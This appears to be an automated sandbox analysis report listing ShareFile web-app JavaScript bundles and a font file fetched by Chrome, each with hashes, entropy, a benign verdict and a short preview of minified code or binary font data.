                                                                        SHA1:7A154A1770E77B6A149D79CBB399EBBC8E494D64
                                                                        SHA-256:75282A51202C8E599C19CB4F229BEF52FD01667A6EA4448EB60E09FEC3EDE86C
                                                                        SHA-512:819794729B25CC7758663140BEE544233F2B2B80B2C67AF124B6E80189E5C647687D94AF71A3EE3A40AEBFB6E940F751884793B7D72E96BFF6DD45EAE2F0CA76
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-storage-plugin-pilet/1.194.0/package/dist/sharefiledev-flow-web.js
                                                                        Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={42467:(e,t,n)=>{"use strict";n.d(t,{fk:()=>Pe,G3:()=>Oe});var r=n(45987),o=n(4942),a=n(71002),i=n(15671),l=n(43144),c=n(97326),s=n(60136),u=n(82963),d=n(61120),f=n(84506);function h(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function p(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?h(Object(n),!0).forEach((function(t){(0,o.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Ob
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 41268, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):41268
                                                                        Entropy (8bit):7.995563635685618
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:B9EB4972777F0182FE841BBC280E5CDE
                                                                        SHA1:EDC69B1AA4B56048EA6B5C0217DABE8144036E25
                                                                        SHA-256:D37AB938D33FE41FEC69CC38C301A5AB7CB5AB928DBA29D9E9407582E08D3D24
                                                                        SHA-512:9575EC043889C64BF8B6C2055BDC6EAB943F0626BFAADE0A11006D5409DC2B4681AE4E789F5D3B06CB0DC047AE4A9F03CBE1EB80349D53ED24316D84F34A991C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.238.0/package/dist/d8fcf3851ba79b1d138a.woff2
                                                                        Preview:wOF2.......4.......H....................................\.`..D.`........d.. .6.$..T..,.. ..2..;..=[....U...O*c@...~.8..3.dn.~..6:.......V}..........nR.C..i..]....C..F.....jA.....*.S.....*..K..Q.B.5w.P...4...~..T-A......[.Z.h...8-O-...2.%3...y.\d..A.0.Go..s..........\.GX..a...V....\.pK...t.5P......)Y2.cC..~..Z....V..!v..%.."....7.Ut..qgA..5..sJ...|...4....Y)......+9.!...,...Y.=W9..p<.........?.i..88..p..].G....c.$J.Y..z...'.h.g..sy.....9=..oq..!...P...L.[.....G..:.ss(..T.1.W.U.l.........Qmb....,.o...G...{o..?...o.;.#f....[".... ..H.4..xx.{w...*.5..,/!.L.i.#.DZZ...HK.%N..Om...B.$....a..#mj.Y....|.F{......HV..e/S.Z.#...j..l.....b].....eX/!<....f,vf..;........1wG|..6.L.}.!.!.$..5.{r..a.|. ........W...._*.'..L.4Dd3..Z.........l..t..b..%.?K>......\T.Mx...d.&A...Q....]uer.........xq.%l......h8m.*.......E.%|..?.Y...\....A[4f1.S...Z.)..e.!.$.....Ki.N.P.m.Ccl..j..;.... .?.qJ..\..<...^@..H..9klj..m.........@.......VoD\.^&0.3...5+#..N;.R.%...W#..S2.[..@.l.1!$
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (61280), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):795965
                                                                        Entropy (8bit):5.679248167034398
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:170DF570C48CEE07397A52066411BD73
                                                                        SHA1:0545D1B65DC17C861079D64153319437D0FFC823
                                                                        SHA-256:9459C72DDFB6A3A3932562B02CBD05096A9EEF953CCA0AD5195719532D2F2D83
                                                                        SHA-512:5F3BE427F1F2D677F1331B319124B29F628F195BFAC7FFD58FC8831FB36002EC815D630307216C60E0E49F5179AFE3261365B2A3626C18DA8E5A224E6C126A63
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-user-act-hist-pilet/1.38.0/package/dist/citrite-citrix-ui.js
                                                                        Preview:System.register(["react","react-dom","tslib"],(function(e,t){var n={},r={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){o.__assign=e.__assign}],execute:function(){e((()=>{var e,a,i={4778:(e,t,n)=>{"use strict";n.d(t,{Zb:()=>a,bP:()=>c,jw:()=>l,qw:()=>u,vI:()=>s});var r=n(9379),o=n(3499);function a(e,t){if(f()&&d(e)){var n=i();window.__citrixui_internal__=(0,r.A)((0,r.A)((0,r.A)({},n),t),{},{instanceSymbol:e})}}function i(){if(f())return window.__citrixui_internal__}function l(){var e,t=i();return null!==(e=null==t?void 0:t.configuration)&&void 0!==e?e:o.T}function c(){var e,t=i();return null!==(e=null==t?void 0:t.onNotification)&&void 0!==e?e:h}function s(){var e,t=i();return null!==(e=null==t?void 0:t.showModal)&&void 0!==e?e:p}function u(e){f()&&d(e)&&delete window.__citrixui_
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65399)
                                                                        Category:dropped
                                                                        Size (bytes):904512
                                                                        Entropy (8bit):5.71994782288608
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4BCA71B5E96BA1017D2F126850C99835
                                                                        SHA1:E48A42C801197D142912941554398979EEE0A639
                                                                        SHA-256:6B98719775F73C629E39427EDF4D3A67506C6AF5E7ED2C9C80F630A1EE0ED03E
                                                                        SHA-512:9524339F39E746523AC7931388045BB5DDDDDD7D7E777543236188B95C78E4FEF1A493045C8BD6E48BC52B55017B3EE44B6A6E7577235AF6FA8C101D277F273B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview://@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.AlertErrorIcon=e.AlertErrorIcon,r.Button=e.Button,r.Checkbox=e.Checkbox,r.CircleOutlinedXIcon=e.CircleOutlinedXIcon,r.EmptyState=e.EmptyState,r.LoadingPrimary=e.LoadingPrimary,r.PageTitle=e.PageTitle,r.SettingsField=e.SettingsField,r.ThemeColor=e.ThemeColor,r.Toggle=e.Toggle,r.fromThemeColors=e.fromThemeColors,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess},function(e){o.__assign=e.__assign,o.__awaiter=e.__awaiter},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e={9272:(e,t,n)=>{"use strict";var r=n(723),o=[],i=[],a=r.makeRequestCallF
                                                                        No static file info